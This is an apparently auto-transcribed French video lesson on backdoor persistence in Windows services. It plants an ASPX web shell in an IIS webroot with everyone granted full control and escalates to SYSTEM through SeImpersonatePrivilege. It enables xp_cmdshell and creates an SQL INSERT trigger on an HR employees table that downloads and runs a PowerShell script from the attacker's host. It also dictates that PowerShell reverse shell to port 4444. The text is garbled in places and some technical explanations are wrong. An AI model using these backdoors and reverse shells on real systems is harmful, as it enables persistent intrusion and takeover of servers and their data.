Maintenant, on va passer à la dernière étape. On va parler un peu persistance dans les services existants. D'accord? Si vous voulez pas utiliser les fonctionnalités de Windows pour masquer une porte dérobée, vous pouvez toujours profiter d'un autre service pour exécuter du code pour vous. Donc on va voir un petit peu comment installer ça sur un 2IS, IIS, serveur web typique de l'écosystème Microsoft. D'accord? Quand tu fais tourner un serveur web sur un Windows Server, on te propose d'installer un composant qui s'appelle 2IS et qui est tout simplement le serveur web de Microsoft. Que ça soit bien clair. Donc néanmoins, toute autre application, avec un certain degré de contrôle, vous permettrait de quoi? D'installer une porte dérobée. Ça pourrait être une base de données, MS SQL, d'accord? Base de données Microsoft SQL, ça marche aussi, d'accord? Donc là, on va voir un peu le 2IS, et le 2IS, en fait, il y a des endroits assez croustillants où on va pouvoir pousser un web shell, d'accord? Donc pour faire le taf, on va se prendre 2 web shells. Sortir de là. Je vais aller dans Arsenal. Sudo git clone http ps2. On va aller dans github.com. Alors, on va cloner tout le repo, ça vous servira, je peux vous assurer. .git. Donc c'est colossal, on parle de web shell de quelques kilooctets, vous avez pour 75 MO, il va falloir chercher, vous balader. On a web shell et vous voyez que vous avez énormément de choses. Nous, ce qui nous intéresse, on va travailler sur de la SPX, comme je vous le disais, qui est un langage de programmation utilisé par Microsoft. Et voilà, on en a plein. On va prendre le commande, si je l'ai sous les yeux. Ah non, il est devrait être dans ASP, autant pour moi. Voilà, donc il y en a plein. Et il doit y avoir le CMD ASP. Là, on a le point texte. Nous, c'est CMD ASP. Alors, vous en avez partout. Vous avez le FSB, ASP, dire. Voilà, on va se pousser celui-ci. Alors, ce qu'il faut comprendre, c'est qu'on a un répertoire qui s'appelle 2IS App Pool. Donc, littéralement, le pool de l'application 2IS. Et on a un compte comme vous avez sous Apache un compte JID 33. Le 33, c'est le www.data. D'accord? Et ben, vous avez également un compte de service qui s'appelle Default App Pool. C'est ce compte qu'on va usurper et il faudra après faire une escalade de privilèges. D'accord? Donc, c'est pas très compliqué pour notre escalade de privilèges. Pourquoi? Tout simplement puisque certes, c'est un utilisateur non privilégié qui fait tourner notre serveur 2IS. Par contre, il a un droit au niveau de ses privilèges, le fameux SE, Impersonate Privilege. Et ça nous permet facilement, grâce à des exploits connus, de devenir administrateur. On va le voir par la suite. Alors, on va reprendre notre machine. Je vais me reconnecter. Concernant le serveur I2S, c'est tout le temps à la racine. Vous avez un répertoire que vous ne retrouverez pas sur vos machines. C'est normal. Pourquoi? C'est le inetpub. Le inetpub, tout simplement, il faut que le composant 2IS soit installé. Alors, comment je sais ça? On va regarder un peu. Vous savez qu'on est sur un Windows Server. Donc, on peut lancer la console d'administration et vous allez voir que le 2IS naturellement est installé. D'accord? Le serveur management me permet d'installer des composants enfichables, comme on les appelle, et ça va me permettre de gérer maintes et maintes choses. On voit que là, donc, on a notre serveur local et je vais pouvoir lui ajouter des services en fonction des besoins intrinsèques. Donc là, vous l'avez compris, il doit y avoir un 2IS qui tourne. Mais au cas où j'ai des doutes, je peux tout à fait aller dans Manage et lui ajouter de nouveaux rôles, de nouvelles composantes. Je peux également en retirer. On va voir un petit peu. Donc je fais suivant, on va aller voir. Role-based, c'est bien ma machine, c'est notre centre de données, Windows Server 2019. On va voir les rôles déjà qui sont attribués au serveur. Donc on voit que ça tourne sur une instance EC2, pardon. Voilà. Et là, vous voyez bien que le web server 2IS a été installé. Mais ce qui est normal. C'est pour ça qu'on retrouve ce répertoire qui est typique, justement, du composant web server. Et puis il vous dit, qu'est-ce que le web server, qu'on appelle 2IS? Ça fournit une gestion qui est
de façon sûre, gérable, scalable, enfin scalable en anglais, hein, et au niveau d'une application qui permettrait de faire fonctionner une infrastructure web. Donc qui dit web dit serveur web, hein. On pourrait lui rajouter un serveur FTP, mais si vous êtes administrateur système, hein, Windows, Active Directory, je pense que vous savez déjà tout ça. Donc là, je vais pas le faire, hein, c'était juste pour vous montrer pourquoi on a ce répertoire, puisque on a tout simplement un rôle et un service qui a été installé, une feature, un composant, c'est le 2IS. Donc, c'est ce répertoire sensible. Si on regarde un petit peu dedans, je vais zoomer pour vous. On l'avait déjà vu, hein, mais on a ça c'est l'architecture, l'arborescence classique que vous retrouverez. On a surtout un qui est très intéressant pour nous, c'est le www-root. D'accord, là-dedans il se passe des choses. On a les fichiers temp, on a les logs, on a l'historique et on a le cluster. Alors, je vais zoomer un peu. Et moi, je vous disais, c'est dans www-root qu'on va aller. Intéressant, on voit déjà les fichiers par défaut, hein, qui sont cette fameuse extension, hein, ASPX et le CS, hein, qu'on peut compiler. Alors, on a notre web config et on a nos clients ASP.NET, hein, Net, donc le fameux .NET, hein, que vous connaissez, langage de programmation propriétaire qui nous permet de faire de l'interopérabilité multiplateforme, hein, quand on commence à coder, et on a également de l'ASP.NET. Donc, à quoi ça sert? L'ASP.NET, c'est tout simplement le quadriciel open source qui gère du web pour nos classes net. .NET. Alors techniquement, ça permet de construire, hein, tout simplement des applications ou des services web qui vont tourner, là en l'occurrence sur un Windows, mais ça peut être également sur Linux, hein, sur macOS, et on va utiliser divers langages de programmation que vous devez tous connaître, du C#, de l'HTML, du JavaScript, du CSS, etc. etc. D'accord? Donc c'est vieux comme le monde, hein, ça date de la première version d'ASP.NET en juillet 2000, et c'est utilisé pour la mise en œuvre d'applications web. D'accord? Alors pourquoi ASP? On va développer, c'est ce qu'on appelle l'Active Server Page. D'accord? Alors on a l'ASP qu'on appelle le classique ASP. Je vous mettrai le lien vers un Wikipédia pour que vous ayez des informations complémentaires. Mais pour quand on parle d'ASP, littéralement serveur de page active. Active, oui, puisqu'elles sont présentées, elles sont servies par le serveur. C'est un serveur web. D'accord? Donc développé en juillet 2000, première version en janvier 2002. Donc maintenant que je vous ai présenté ça, on va transférer nos shells. Il nous faut les autorisations également du fichier, hein. Pour pouvoir y accéder, le serveur web doit avoir les droits. Alors on va pas se prendre la tête, vous l'avez compris, on va pousser nos shells militarisés et on va leur donner les droits. On va donner les droits à tout le monde. Comme ça, ce sera un peu la fête au village. Naturellement, si vous le faites pas, qu'est-ce qui va se passer? Vous allez avoir une autorisation, hein, qui va vous être refusée lors de l'accès à l'URL du shell. D'accord? Donc il nous faut les autorisations complètes, et comme on l'a vu précédemment, on va faire un grant everyone, donc pour tout le monde, 2.f. F, on a vu que c'est le full access, full control. D'accord? Donc c'est ce qu'on va faire. On est en 200, on va le sauvegarder. cmd.aspx CACLS sur notre cmd aspx, on le grant for everyone. Ensuite, on peut aller sur notre serveur. Donc, il doit y avoir un port 80 443. On va aller voir sur le 80 d'abord. Je sais pas, fait de recours, hein, mais à vue d'œil, de toute façon. Ouais, sur le HTTP, ça tourne. Donc, on voit qu'on peut, une application qui permet de mettre un utilisateur, une extension sur barre vert. Je fais supprimer, je peux update, je peux cancel, on va regarder un petit peu le code source. Donc là, il y a le cell spacing pour notre table, ça fait la présentation, pas de problème. On voit qu'on a du JavaScript qui est utilisé, return config, want to delete this employee. Donc, grosso modo, hein, c'est une application qui permet de gérer une base de données, hein, on va dire, pour
les employés. Bon, rien de pertinent pour nous, mais c'est pas ça qui nous intéresse, d'accord? C'est de prendre le contrôle. On a vu qu'à la racine, vous l'avez compris, c'est pour ça que ça s'appelle www root, hein, si tu te rappelles bien. Regarde, voilà, son nom l'indique, d'accord? C'est à la racine du serveur web. Donc, il y a de fortes chances, pourquoi? Bah, que le fichier ASPX que j'ai poussé se retrouve là. Et en effet, on peut maintenant quoi dire faire du command injection. Et ouais, on peut maintenant faire du command injection. D'accord. Donc c'est sensible. Regardez nos privilèges aussi ou un moyen priv. Et on voit qu'on a notre impersonate. Donc les web shells, hein, ça fournit un moyen simple de laisser une porte dérobée sur un système. Il est habituel pour les équipes bleues de vérifier l'intégrité des fichiers dans le répertoire web et toute modification apportée à un fichier va déclencher probablement une alerte. Faut le savoir. Donc je vais récupérer mon truc. Ok, je regarde, le C99 il est là, le Rogue WinRM il est là, ouais, donc ça l'a bien pris à partir de notre web shell. J'aurais même pas besoin, là je fais que vérifier, mais on pourrait tout faire en ligne de commande. Donc maintenant qu'on l'a poussé, il va falloir pousser l'exploit. Alors, si je fais un dire, donner des droits, ici ACLS, qu'est-ce que je veux? Rogue. Everyone F. Ok, tentons. Alors, il nous faut maintenant ouvrir sudo netcat nvp. On va prendre le port 80 qui est plus utilisé par le Python, c'est pour ça que je l'ai shooté. Et on va pousser la porte dérobée, on va voir. Donc on va pousser notre petite porte dérobée. Alors si on tente avec un chemin absolu, on va voir. Donc moi je vais dans inet, on l'a vu. Dans inet j'ai www root. Là-dedans je lui dis tu vas choper rogue win rm.exe. Je vais lui dire p. Tu vas exécuter net. Ah oui, il l'a pas netcat. Ah, il est sur ces deux points. Donc tu vas sur ces deux points dans Tools. Tu télécharges netcat.exe. Alors, comment ça marche? Rogue WinRM, c'est un exploit d'escalade de privilèges local qui permet de passer d'un compte de service avec le SE Impersonal Privilege au compte système local. Si WinRM ne fonctionne pas. Alors, vous avez vu que il fonctionnait. Donc j'ai dû shooter le listener. Et j'ai pu ensuite le relancer. D'accord. Grosso modo, il écoute la connexion entrante. Vous savez, le problème en fait avec WinRM, ce que ne savent pas beaucoup de gens, c'est que il hérite des droits NT Authority System. C'est-à-dire que vous allez lancer le service, mais le service, lui, qu'est-ce qu'il fait? Il hérite des droits les plus hauts, NT Authority System, et il attend une connexion sur le 5985, une connexion entrante, d'accord? Donc c'est typiquement, on a notre serveur web de ZS et on a une composante WinRM que je viens de pousser, qui est un serveur web minimal. Il va essayer de négocier une authentification NTLM avec tout service qui essaye de se connecter sur ce port. Ensuite, on va utiliser le BITS. Je vous ai dit, ça permet de télécharger pas mal de choses sous Windows. Une partie de Windows Update fonctionne grâce au service BITS, notamment, entre autres, pas que. Et lui, il fonctionne en tant que système local. D'accord? Donc, il va se déclencher, il va essayer de s'authentifier auprès de notre auditeur voyou. Et une fois qu'il est authentifié auprès de l'auditeur voyou, notre rogue,
qui tourne sur le serveur, il est en mesure en fait d'usurper l'utilisateur du système local et ça va engendrer un processus arbitraire avec ses privilèges. Le problème, c'est que WinRM, lui, je vous l'ai dit, il est NT Authority System. Du coup, on va pouvoir pousser une part dérobée via la création d'un jeton avec les droits. Create process with token. Et on passe NT Authority System. Donc on écoute toutes les communications sur le 5985. Il est hébergé par notre serveur web. On a pris le contact grâce au web shell. Il attend la négociation, requête de négociation. Il envoie un 401. D'accord. Le 401, en fait, ça permet d'intercepter le challenge response type 2 en NTLM. C'est la crypto, l'algo de crypto qui est utilisé. Ensuite, on va recevoir un paquet HTTPS avec qui dit challenge, dit response. Le type 3, c'est parfait, c'est exactement ce qu'on veut. Et ça, on le passe dans Accept Security Context. D'accord? Donc, c'est une fonction qui va être appelée et qui nous permet de déclencher le BITS. Et une fois que c'est fait, on va forger un jeton grâce au privilège et faire un appel vers Create Process with Token W. D'accord? Donc, on va justement forger un jeton et ce jeton hérite des droits, vous l'avez compris, de notre auditeur voyou qui utilise la composante WinRM qui est lancée par système. D'accord? Donc on se sert de BITS pour lui voler son jeton, interagir avec WinRM. WinRM, on lui donne notre jeton qu'on a forgé et de facto, on hérite des droits NT Authority System. Et si notre rogue WinRM pousse quoi? On lui demande tout de suite d'exécuter net 464, d'accord? De façon automatique, vers CMD, ma machine, le port 80, tu as bien compris que quoi? Si j'écoute sur le port 80, je récupère une connexion. D'accord? Donc voilà comment ça marche. Ok, donc ça, il vous le montre pas dans le CTF si jamais vous le faites. Donc ça c'est un petit truc en plus que je vous montre. On n'était pas nécessaire de le faire. Maintenant on va péter la base de données. On a du MSQL. On va voir comment installer une porte dérobée dans une base de données. Donc il existe toujours plusieurs façons de faire, vous le savez, notamment pour backdoorer un serveur MSQL. Ne confondez pas MySQL avec MSQL. MS Microsoft SQL serveur. Donc pour l'instant, on va examiner l'un d'entre eux. Il y a beaucoup de choses. On a ce qu'on appelle des triggers en anglais. C'est des déclencheurs dans le moteur MSQL qui vont nous permettre de lier des actions à effectuer avec des événements spécifiques qui se produisent tout simplement en base de données. Ces événements peuvent aller d'une connexion d'un utilisateur à tout simplement des données insérées ou des mises à jour ou des suppressions au niveau d'une table, de nos records, de nos enregistrements en base de données. Donc on va utiliser un insert. Donc insert, c'est un déclencheur qui va gérer ce qu'on appelle le HRDB au niveau de la base de données. Déjà HRDB, donc HR Human Resources, DB base de données de ressources humaines. Partons du principe qu'on est sur le serveur qui gère la base SQL. On peut accéder au moteur et à la base de données grâce à Microsoft SQL Server Management Studio, là en version 18. Alors, il faut qu'on reconfigure XP _ command shell. C'est une procédure qui est stockée par défaut dans n'importe quelle installation, mais elle n'est pas activée par défaut. Donc, on va l'activer avec quelques lignes de commande. Et puis, on va se connecter avec nos informations d'identification, notre compte admin local, et on va pouvoir faire la modification en base de données. Donc, on va utiliser sp _ configure. Grosso modo, ça permet d'afficher ou de changer des configurations, les réglages globaux de la base de données, du moteur de base de données pour notre serveur actuel. SP configure et je vais lui donner des choses. Donc là, je vais me connecter. Oui. L'utilisateur, on va utiliser un utilisateur intégré. Windows Authentication, connect, il va me demander ou pas.
Vu qu'on est en admin, je pense qu'il ouais, non, il se connecte directement. Sinon, je devrais rentrer, vous l'avez compris, mon mot de passe. Alors, on va lui faire new query et c'est là qu'on va pousser la demande de conf. Ok. Alors, j'ai dit sp configure. On va lui faire un show advance. Pardon. Donc on va lui faire un show advance, tout est en camel case. Options 1, fin de l'instruction, important. D'accord. Ok. On lui dit reconfigure. Donc tu vas reconfigurer, vous l'avez compris. Donc on va reconfigurer go et on lui passe notre deuxième instruction, pareil, sp configure. Cette fois-ci, on va travailler sur notre xp underscore shell et c'est parti, on va le passer à 1, fin de l'instruction et pareil, reconfigure et on lui met un go. Voilà, on peut exécuter, d'accord? Il nous dit ok, pas de problème, je lance la procédure, la déclaration de reconfiguration au niveau de ton installation. Tu m'as demandé d'abord d'afficher les options avancées et dans les options avancées, puisque en fait c'est des réglages qui sont stockés en base de données, dans les options base de données, enfin dans la base de données, dans la table peut-être configure, sp configure ou show advanced option, je vais aller modifier une des lignes, vous l'avez compris, une des rows, et il y a quoi? Bah il y a XP CMD shell et on a dans l'autre colonne, on a quoi? On doit avoir un entier, d'accord? Ou un booléen, ça doit être un booléen. On doit soit avoir 0 désactivé, soit 1 activé. On a passé notre booléen à true, à vrai, donc on le met sur 1, d'accord? Sinon il serait sur false. Avant il était sur false. Et il nous dit pas de problème, j'ai bien fait ce que tu m'as demandé pour tout ça. D'accord? Donc les options là sont effectives. Donc ça c'est cool. Maintenant, il faut s'assurer aussi que le site web puisse accéder à la base de données pour que notre commande xp underscore command shell pour passer un shell de commande, pouvoir envoyer des instructions. Donc je vous ai dit, le problème c'est quoi? C'est que par défaut, notre serveur de JS, il utilise quoi? Un compte utilisateur qu'on a vu précédemment, qui n'est pas... Il faut faire l'escalade de privilèges que je vous ai montré juste à l'instant avec Rogue Win RM1. Donc, si on a un compte par défaut et que mes applications web utilisent un utilisateur de base de données restreint, il faut également l'élever. On va utiliser sysadmin. Et quoi? Bah justement, ça tombe bien, l'administrateur il est sysadmin, d'accord? Parce que les utilisateurs de base de données qui ne sont pas sysadmin ne peuvent pas le faire. Ça veut dire que pour nous, vu qu'on est connecté en tant que quoi? Regarde bien là, regarde tout. Hop, t'es connecté en tant qu'administrateur, donc t'es sysadmin, tu peux faire cette modification. Donc on va demander et accorder les privilèges à tous les utilisateurs et on va emprunter tout simplement l'identité de ça. Ça, c'est SA6 admin. D'accord? C'est l'administrateur SGBD. C'est l'administrateur de gestion de base de données. Alors, j'efface ça. Qu'est-ce que je lui dis? Use, utilise quoi? On va utiliser le master au niveau de la configuration. Tu vois qu'il me le propose. Je peux faire l'autocomplétion avec, comment dire, tabulation. Grant, donc tu vas donner les droits. Tu vas permettre l'impersonate. Je veux en effet voler l'identité de quelqu'un. Et on utilise une autre personne en tant que. On va se servir de ça. Login, bah oui, au lancement. Et là, on a un double séparateur en colonne, comme on l'appelle, de points. Ça, tout, et on le passe en public. Pourquoi public? Puisque, vous l'avez compris, il faut que le serveur web puisse y avoir accès. Et techniquement, bah, ça va déclencher et créer notre trigger, notre déclencheur. Et ensuite, on va passer à notre base de données HRDB, puis on va continuer notre étape. Mais en tout cas, on était en private, on le passe en public. Voilà, il nous dit que les commandes sont bien déroulées. Et enfin, il nous faut gérer. Qu'est-ce qu'on a vu? Notre déclencheur, use. Et on travaille sur quoi? Sur HR Human Resource DB.
d'accord? Et tu as même le signe de base de données. Voilà, le déclencheur. Qu'est-ce qu'il va faire? Il va exécuter la commande xp-cmd shell, ça va lancer du PowerShell, ça va télécharger et exécuter un fichier PS1 à partir du serveur web qui est contrôlé par l'attaquant. Et le déclencheur, il est configuré pour qu'à chaque fois qu'on fait un insert, par exemple, dans la table, dans la base de données HRDB, on aura une table employée, d'accord? Et, notre table, dès qu'on fait un insert dedans, ça va être exploité et on va pouvoir pousser une porte dérobée. Alors, il nous faut créer notre déclencheur. On veut notre create trigger, tout en majuscule, important. C'est du SQL. Ensuite, SQL backdoor, on lui donne un petit nom pour s'y retrouver. Ensuite, on, on a vu qu'on travaillait sur quoi? Sur la base de données HRDB et il faut lui donner la clé. On est en DBO employees. Alors, qu'est-ce que ça veut dire? Le DBO, vous savez qu'on travaille en base de données. Le DB, c'est le database, object. On travaille sur des objets en base de données. Ma table, c'est employé, et la table employée, elle est comprise dans la base de données des ressources humaines. La Human Resource Database, HRDB. Voilà pourquoi on fait ça. Ensuite, for, pour un insert en tant que quelque chose. Je lui dis quoi? Tu vas exécuter as login. Alors là, il faudra apprendre le SQL. En tant que SA, sysad, d'accord? Administrateur de base de données. Donc le plus haut dans MySQL, c'est le big boss. Et tu vas exec master. On travaille sur master. Dans la table master, on veut quoi? Que tu exécutes XMP. Et on l'a vu, on a quoi? XMP, vous voyez qu'il y en a plein des XMP. On va prendre, ce qui nous permet d'utiliser le command shell. D'accord? Alors, qu'est-ce qu'on veut? On lui a dit, exécute du PowerShell. C'est ce qu'on va faire. On lui dit, écoute, tu lances du PowerShell et tout de suite, dans la foulée, qu'est-ce que tu vas faire? Tu vas venir télécharger. Alors, on crée un nouvel objet en PowerShell. On va faire un IX indirectement à partir d'Internet. Donc, nous, il nous faut quoi? Je vais coller. Il nous faut un new object, un nouvel objet, et on va utiliser la classe qu'on utilise d'habitude. C'est en net, on a web client. Web client nous permet de faire beaucoup de choses en web. C'est du HTTP, ça tombe bien, et on utilise tout le temps, vous le savez, le download string. Littéralement, télécharge une chaîne. Et cette chaîne, on va lui donner, alors je la mets entre parenthèses, c'est ma machine sur le port 80, et on va créer un script qui s'appelle evil script.ps. C'est un exemple, vous l'appelez comme vous voulez, d'accord? Alors, l'insert, il aime pas, bah oui, c'est normal, c'est insert. Parfait. Donc là, on a configuré la base de données. On lui a dit, écoute, tu peux utiliser le command shell, le xp_command shell. Je vais te le passer, tu vas dans les options avancées, tu l'utilises, tu le passes sur enable. Ensuite, on a créé notre trigger. On lui a dit, écoute, tu vas aller en base de données, et sur la base de données des ressources humaines, dès que quelqu'un va insérer un utilisateur, pourquoi on fait tout ça, les gars? Réfléchissez. Qu'est-ce qu'on a vu tout à l'heure? Je vous disais, il y a une application qui gère notre serveur. Il y a une application qui permet d'ajouter des employés, d'éditer, d'ajouter des employés. Dès que tu fais un insert en base de données, t'as compris ou quoi? Pourquoi on fait tout ça? Parce qu'il y a quelqu'un qui va créer un nouvel employé, et dès qu'il créera un nouvel employé, ça va ouvrir notre porte dérobée. Et on va récupérer un reverse shell avec une porte dérobée injectée directement dans une base de données. Est-ce que c'est pas complètement dingue, ça? Mais c'est pas fini. Pourquoi? Parce qu'il faut héberger notre script malicieux. On l'a vu. D'accord? Donc je vais sortir de là, je vais faire un peu de clean. Fermez ça. Fermez ça. Et on s'arrêtera là. Donc là, j'ai le 81. Il nous faut notre script. Alors,
mon script. On va le créer là. Sudo nano, on l'a appelé comment? Evil script.ps. Alors, qu'est-ce qu'il nous faut? Il nous faut une petite variable. Notre variable client. Client, elle va gérer notre objet. Hein, donc, c'est que du PowerShell. Object. On veut quoi? Dans le système, on a quoi? On a net et il nous faut un socket. Hein, sinon, je peux pas établir quoi? Une connexion réseau. En TCP client. Et qu'est-ce que je lui passe en paramètres? Mes deux paramètres. J'ai besoin de quoi? J'ai besoin de l'adresse IP de ma machine. Hein, et je vais lui donner un port. On va lui donner, allez, le port script qui dit. C'est pas un problème. D'accord? Je referme. Hop. Là, je suis propre. Fin de l'instruction. Première ligne. Qui dit socket dit stream. D'accord? On ouvre un socket, un web socket, ou un raw socket. Pourquoi? Pour établir une communication réseau entre deux machines sur une architecture client-serveur. Le serveur, je l'ai. Moi, je veux être le client. C'est pour ça que j'ai défini ma variable client. Maintenant, on va faire passer dans ce tube, ce pipe, c'est un flux, et on appelle ça un stream. Donc, on va se faire une nouvelle variable stream qui va réutiliser quoi? Ce qu'on vient de déclarer. On a déclaré et initialisé notre variable client et on fait un get stream. Get stream, ça va récupérer le flux réseau si tu veux. Pardon, je suis en train de me distraire. Ok. Seconde ligne. Qu'est-ce qu'il nous faut? Gérer ça. On va récupérer quoi? C'est des données réseau, on va récupérer des bytes. Donc il nous faut une liste, un index, un array, et je sais que quoi? Sur du TCP, j'ai 65 535 ports. Ok? Et le premier, notre index, ça sera le 0. Donc je peux aller du port 0 à 65 535. Et moi, je lui ai dit, écoute, tu vas utiliser mon adresse IP, c'est le 4444. D'accord? Mais pareil, le port distant, moi je ne le connais pas. Donc on prend tous les ports. Donc il faut créer un array. On va créer un tableau en bytes. Je vais le remplir. D'accord? Qu'est-ce qu'il nous faut d'autre? On va le déclarer. On va lui donner pareil un nom de variable. C'est pour ça qu'on lui met un $, on appelle bytes. Et là, je vais faire mon intervalle. Je lui dis de 0 à 65 535. Et pareil, gestion de notre index. Des args. Puisque quand je me connecte, si tu veux, le serveur, que tu comprennes bien, lui, il va nous donner un port aléatoire. Moi, je le connais pas. D'accord? Donc là, je suis en honte. ANT, ça devrait suffire. D'accord? Et il va nous donner un port. Mais moi, ce port, je le connais pas encore. Donc, c'est pour ça qu'on lui dit, écoute, de 0 à 65 535. Et peu importe le port que tu me donneras, il fera partie de ma liste. D'accord? Donc ça, c'est bon. On gère le stream. Maintenant, il faut quoi? Il nous faut récupérer, envoyer et récupérer de la donnée. D'accord? Pour établir une communication. Donc, qu'est-ce qu'il nous faut? Il nous faut définir nos variables qui vont gérer le flux. D'accord? Et il nous faut gérer le chemin, la donnée. Et il nous faut également quoi? Une communication avec nos flux. Il nous faut boucler sur notre programme. D'accord? Alors, c'est ce qu'on va faire. Donc, while, une boucle while, pendant que quoi? Pendant que i, généralement on utilise i, for i ou while i, on veut quoi? Travailler sur notre stream, on l'a défini, c'est notre variable. Stream est égal à quoi? À client get stream. On va faire un read, opération de lecture, sur quoi? Pareil, qu'est-ce qu'on a défini? Ensuite, notre variable byte, d'accord? On va s'en servir. On veut connaître la longueur, le length. On veut que ça soit pas nul. Donc, not equal to 0. À partir de là, si c'est pas not equal à 0, parfait. On rentre dans notre boucle. Première variable data, pareil, on va gérer le new object. Vous vous rappelez, on va faire un IEX. Donc c'est pareil, il va falloir encoder notre string et le passer dans notre flux qui va être récupéré par le serveur. Et nous, on est le client. Donc il va falloir quoi? Envoyer des données et qu'on nous renvoie des données. Ça me permet d'établir un canal de communication bipartie, d'avoir mon callback et donc d'avoir mon reverse shell. D'accord? Donc tout ça, il faut qu'on le crée.
Hein, là, on est en train de créer notre script malicieux en PowerShell de toutes pièces. Donc, il nous faut un nouvel objet. C'est là où je veux en venir. Il nous faut notre type name. Donc, qu'est-ce que c'est? Bah, on travaille sur système. Hein, ça, c'est notre classe. On veut du texte. Et on a la possibilité d'avoir de l'ASCII, hein, encoding. Pour nos communications, ça sera le plus simple. Hein, si on veut récupérer, transférer des données. Ensuite, on veut récupérer le string en bytes. Donc notre pourcentage i, hein, qu'on a passé. On reste dans notre bloc. On va faire un sendback. C'est une nouvelle variable. Hein, renvoyer les données via un ix. On veut récupérer la data. Redirection des flux. Hein, standard input, standard output. On veut On veut 2 vers 1. Bah, c'est normal. Sinon, je peux pas établir un canal de communication. Et on va lui faire un outstring. Ensuite, deuxième variable sendback. On va l'appeler sendback2. Il nous faut récupérer sendback, la première. Pourquoi? Si j'envoie des informations d'un côté, il faut que je puisse aussi les recevoir de l'autre. Et on a vu qu'on utilise du PS, du PowerShell. D'accord? PWD, je veux savoir où je suis et qui me récupère le pass. Hein? Et il reroute tout ça. Ensuite, quand j'envoie des données, sendbyte, il nous faut notre encodage. Je vous rappelle qu'on a utilisé l'ASCII, ça tombe bien. Donc on va du text encoding, hein, ça facilite le transport de nos informations en ASCII. Et on fait encore un getBytes, hein, pour récupérer tous nos bytes, tous nos octets. On veut l'intégralité des informations qui sont envoyées par l'ordinateur, par le serveur, vers mon client. Donc ça sera sendback2. Ensuite, on va travailler sur notre stream. Qu'est-ce qu'il faut? Il faut écrire et lire, hein, si tu veux récupérer des communications. Donc, on va faire un write. On fait notre send byte. On lui passe encore, on l'a vu, 0. Et on veut connaître la taille. Send byte. On veut connaître la taille. Pardon, point virgule. Je me distrais. Donc notre indentation, on a quasiment fini. On veut notre stream. On va flush, hein, les données. Et quand on établit une communication et qu'on ouvre un socket, qu'est-ce qu'on pense à faire? À fermer le socket. C'est très important. Donc notre client, qu'est-ce qu'on fait? On a fait un getStream, on a ouvert notre flux, on lui passe un close pour fermer les communications une fois que c'est fini. D'accord? Quand vous ouvrez un socket, vous pensez tout le temps à le fermer. D'accord? C'est les bases. Donc là, il nous faut 2 terminaux. On va en ouvrir 2. Pas de problème. Qu'est-ce que je veux? Qui sont concernés, hein, dans cet exploit. On a On a un déclencheur qui effectue la première connexion pour télécharger mon script, Evil Script. D'accord? Qu'est-ce qu'il fait? On a vu qu'il utilise le port 8000 pour ce faire. C'est ce que j'ai mis en base de données tout à l'heure, quand je vous parlais, si vous avez suivi un peu. Donc, j'ouvre UFW, hello, 8000. D'accord? Donc, pour nous, ça veut dire qu'il va falloir que j'héberge un serveur, cette fois-ci, sur le 8000. Ok, première étape. Et ensuite, on veut récupérer le callback pour avoir notre shell inverse, notre reverse shell. Et notre reverse shell, on lui a donné quoi? On lui a donné le 4454. Comment je sais ça? J'en ai aucune idée. Cat Evil Script, qu'est-ce qu'on lui a dit?
Ah non, j'ai 4444. Excusez-moi, je me distrais. Donc sudo nben 4 pour Metasploit. Ok. Maintenant, il faut pousser le déclencheur. Le déclencheur, qu'est-ce qu'on a vu? On a vu que c'est en insert. Et en insert, si tu ajoutes un employé dans l'application, eh ben, il t'arrive des petites bricoles. Comment je sais ça? Ben, on l'a vu. Qu'est-ce qui va se passer? Insert en base de données, déclencheur, notre trigger va donner accès à la console. Voilà, ça récupère notre Evil Script et ça pousse la backdoor. S'il veut bien. Je suis dedans. Et on est MSQL Express. D'accord? Donc on a hérité bien du compte qui est dédié à la base de données. Cependant, ce compte, qu'est-ce qu'il a de spécial? On a vu que c'est, on l'a défini, notre ça, et le ça, on a vu que c'est le System Admin of MSQL Server. So, eh ben, peut-être qu'il a un petit peu plus de privilèges qu'on le pense. Ok? Il fait partie du built-in. Donc on est mandateur sur tout. Donc on est NT Authority et on a, via cet exploit, usurpé le compte de service. Vous savez que les comptes de service, en principe, on ne peut pas les utiliser. Mais vu que là, on a poussé la porte dérobée dans l'application, directement dans la base de données, on usurpe les droits du compte de service. Donc maintenant, on est la base de données. D'accord? Et on a des droits qui vont nous permettre de faire beaucoup de choses. Et on le voit. Create Global Privilege, SE Increase Working Set Privilege, Impersonate Privilege. Donc ça, déjà, je peux passer de NT Authority System à NT Authority via une note privesque sans aucun problème. D'accord? Et puis en plus, on peut même remplacer les jetons, le niveau d'habilitation des jetons. Donc on va pouvoir usurper d'autres identités au sein de l'Active Directory. Donc voilà, c'était un petit peu compliqué. Si vous débutez, vous n'avez aucune notion de SQL, bah il n'y a pas de secret. Lisez des livres, apprenez le langage, c'est extrêmement puissant, puisque on vous demande pas d'être expert en base de données, mais il faut comprendre parfaitement le langage SQL, savoir pousser des portes dérobées en SQL, et si quand même il va falloir bien connaître, parce que quand tu feras des SQLI, bah si tu comprends pas comment fonctionne la base de données, tu ne comprendras pas. Donc bah lâchez rien, ça va prendre du temps. Moi-même en SQL, j'ai encore beaucoup de boulot. Voilà un script qui nous ont donné qui est plutôt simple. Vous voyez, on a fait quoi? 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 lignes de code en PowerShell. Et on voit que notre Evil Script, il fait parfaitement le taf. Dès qu'il y a une interaction, un insert, on récupère la main sur le serveur. Donc voilà, j'espère que ça vous a plu. Et puis, bah moi, comme d'habitude, je vous dis à très bientôt. Do. There isn't anything further that we thought we could do. And yet, look what happened.